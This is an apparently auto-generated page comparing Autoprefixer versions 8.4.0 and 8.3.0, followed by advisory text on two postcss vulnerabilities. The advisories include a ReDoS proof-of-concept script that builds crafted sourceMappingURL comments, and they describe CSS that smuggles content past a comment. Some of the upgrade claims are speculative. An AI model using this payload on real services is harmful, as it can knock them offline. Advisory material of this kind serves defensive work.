Autoprefixer is a powerful PostCSS plugin that automatically adds vendor prefixes to CSS rules, ensuring cross-browser compatibility based on data from Can I Use. Comparing versions 8.4.0 and 8.3.0 reveals subtle but potentially impactful changes for developers. Both versions share the same core functionality: parsing CSS, applying prefixes based on browser support, and utilizing dependencies like num2fraction, normalize-range, and postcss-value-parser. They also both have the same license, repository, author and number of files.
The key differences lie in the updated dependencies. Version 8.4.0 bumps postcss from ^6.0.21 to ^6.0.22, browserslist from ^3.2.4 to ^3.2.6, and, most notably, caniuse-lite from ^1.0.30000830 to ^1.0.30000832. These updates suggest improvements in PostCSS parsing capabilities, enhanced browser target selection through Browserslist, and the incorporation of more recent browser compatibility data from Can I Use. Users might experience slightly improved prefixing accuracy and potentially support for newer CSS features with the newer version. The unpacked size also increased slightly, from 328588 to 329448, which means that the release incorporated more data than the previous one. Developers should, therefore, consider upgrading to version 8.4.0 to benefit from the latest browser support information and potential performance enhancements offered by the updated dependencies while introducing minimal breaking changes.
All the vulnerabilities related to the version 8.4.0 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.